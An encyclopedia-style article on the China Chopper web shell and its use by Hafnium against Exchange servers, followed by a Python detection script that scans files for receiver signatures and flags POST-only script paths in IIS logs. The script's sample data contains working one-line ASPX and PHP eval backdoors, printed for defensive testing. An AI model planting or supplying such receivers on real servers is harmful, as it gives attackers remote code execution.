China Chopper

China Chopper is a web shell approximately 4 kilobytes in size, first discovered in 2012. It is commonly used by Chinese threat actors, including advanced persistent threat (APT) groups, to remotely control compromised web servers. It has two components: a client interface (a Windows executable run by the attacker) and a small server-side "receiver" file planted on the compromised web server.

China Chopper offers many command-and-control features, including a password brute-force option, code obfuscation, file and database management, and a graphical user interface. [1] [2] [3] [4] It was originally distributed from the website www.maicaidao.com, which is now offline. FireEye found that the client is written in Microsoft Visual C++ 6.0.

China Chopper was used in attacks against eight Australian web hosting providers, which were compromised through their use of an unsupported operating system (Windows Server 2008). The attackers connected the compromised web servers to a Monero mining pool and mined approximately A$3,868 worth of Monero. [5]

In 2021, the APT group Hafnium exploited four zero-day vulnerabilities in Microsoft Exchange Server during the 2021 Microsoft Exchange Server data breach and used a JScript variant of China Chopper as its post-exploitation backdoor. The web shell was written to the server when one of the vulnerabilities was exploited, allowing the attackers to run programs with administrator privileges. [6] Knowing only the URL of the .aspx file containing the script, an attacker could send an HTTP POST request whose body carried a command; the script passed that value directly to the JScript 'eval' function and executed it immediately, giving the attacker arbitrary code execution on the server. [7]
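As a practitioner's illustration of the two detection angles this description suggests (the tell-tale eval-of-a-request-field receiver on disk, and a script path that is only ever reached by POST requests), here is an added example in Python. It is not code from the original article, from Mandiant, or from any cited source. The file signatures assume the textbook one-line receiver forms described in the Mandiant write-ups cited above, with the request parameter name left as a wildcard because it is attacker-chosen; the file contents and IIS W3C log lines are constructed for the demo. Real samples are often obfuscated or split across files, so treat a hit as a triage lead rather than proof.

```python
"""Added example: spot China Chopper receivers on disk and in IIS logs.

Not code from the article or from any cited source. Signatures follow the
textbook one-line receiver forms (an eval() over a request field); the
parameter name is attacker-chosen and therefore matched with a wildcard.
All file contents and log lines below are constructed for the demo.
"""
import re
from collections import defaultdict

# Textbook receiver forms. Each is a single eval() over attacker-supplied
# request data; the traditional field name is "password" but any name works,
# so the pattern accepts any quoted name.
CHOPPER_PATTERNS = {
    "aspx_jscript": re.compile(
        r'<%@\s*Page\s+Language\s*=\s*"?J(?:ava)?script"?\s*%>\s*<%\s*'
        r'eval\s*\(\s*Request\.Item\[\s*"[^"]+"\s*\]\s*,\s*"unsafe"\s*\)',
        re.IGNORECASE),
    "php": re.compile(
        r'<\?php\s*@?eval\s*\(\s*\$_(?:POST|REQUEST|GET)\s*\[\s*'
        r'[\'"][^\'"]+[\'"]\s*\]\s*\)',
        re.IGNORECASE),
    "asp_vbscript": re.compile(
        r'<%\s*eval\s*\(?\s*request\s*\(\s*"[^"]+"\s*\)', re.IGNORECASE),
}


def scan_file(content):
    """Return the names of receiver signatures that match a file's contents."""
    return [name for name, rx in CHOPPER_PATTERNS.items() if rx.search(content)]


def parse_w3c(log_text):
    """Parse IIS W3C extended log text into dicts keyed by the #Fields names."""
    fields, rows = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            values = line.split()
            if fields and len(values) == len(fields):
                rows.append(dict(zip(fields, values)))
    return rows


def post_only_scripts(rows, exts=(".aspx", ".asp", ".php")):
    """Map script URIs that only ever receive POSTs to their source IPs.

    A China Chopper receiver has no page of its own: every interaction is a
    POST whose body carries the command, so a script path that is POSTed to
    but never GET-requested deserves a look. Legitimate form handlers can
    match too, so the result is a triage list, not an alert.
    """
    methods = defaultdict(set)
    sources = defaultdict(set)
    for r in rows:
        uri = r.get("cs-uri-stem", "").lower()
        if uri.endswith(exts):
            methods[uri].add(r.get("cs-method"))
            sources[uri].add(r.get("c-ip"))
    return {uri: sorted(sources[uri])
            for uri, m in methods.items() if m == {"POST"}}


# Constructed file contents (hypothetical names, not captured samples).
SAMPLE_FILES = {
    "supp0rt.aspx": '<%@ Page Language="Jscript"%>'
                    '<%eval(Request.Item["cmd"],"unsafe");%>',
    "index.php": "<?php @eval($_POST['password']);?>",
    "login.aspx": '<%@ Page Language="C#" %><html><body>login</body></html>',
}

# Constructed IIS W3C log excerpt, fields trimmed to the ones used here.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time c-ip cs-method cs-uri-stem sc-status
2021-03-03 04:12:09 203.0.113.7 POST /aspnet_client/supp0rt.aspx 200
2021-03-03 04:12:11 203.0.113.7 POST /aspnet_client/supp0rt.aspx 200
2021-03-03 04:13:02 198.51.100.4 GET /owa/auth/logon.aspx 200
2021-03-03 04:13:05 198.51.100.4 POST /owa/auth/logon.aspx 302
2021-03-03 04:14:40 203.0.113.9 POST /aspnet_client/supp0rt.aspx 200
"""

if __name__ == "__main__":
    for name, body in SAMPLE_FILES.items():
        print(f"{name}: {scan_file(body) or 'clean'}")
    for uri, ips in post_only_scripts(parse_w3c(SAMPLE_LOG)).items():
        print(f"POST-only script {uri} from {', '.join(ips)}")
```

In the constructed data the dropped `supp0rt.aspx` matches the ASPX receiver signature and is the only script path reached exclusively by POST, while the legitimate `logon.aspx` sees both GETs and POSTs and is left alone. On a live server, run `scan_file` over every script under the web root and `post_only_scripts` over the full log retention window, and follow up hits by checking the file's creation time against the server's patch history.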

References

1. "China Chopper". NJCCIC. Archived from the original on 13 January 2019. Retrieved 22 December 2018.
2. "What is the China Chopper Webshell, and how to find it on a compromised system?". 28 March 2018. Archived from the original on 13 January 2019. Retrieved 22 December 2018.
3. "Breaking Down the China Chopper Web Shell - Part I". Mandiant. Archived from the original on 13 January 2019. Retrieved 3 January 2022.
4. "Breaking Down the China Chopper Web Shell - Part II". Mandiant. Archived from the original on 7 January 2019. Retrieved 3 January 2022.
5. Stilgherrian. "Australian web hosts hit with a Manic Menagerie of malware". ZDNet. Archived from the original on 31 January 2019. Retrieved 17 March 2019.
6. "ProxyLogon" (in Chinese). Retrieved 16 March 2021.
7. "Exchange Cyberattacks Escalate as Microsoft Rolls One-Click Fix". Threatpost. Retrieved 16 March 2021.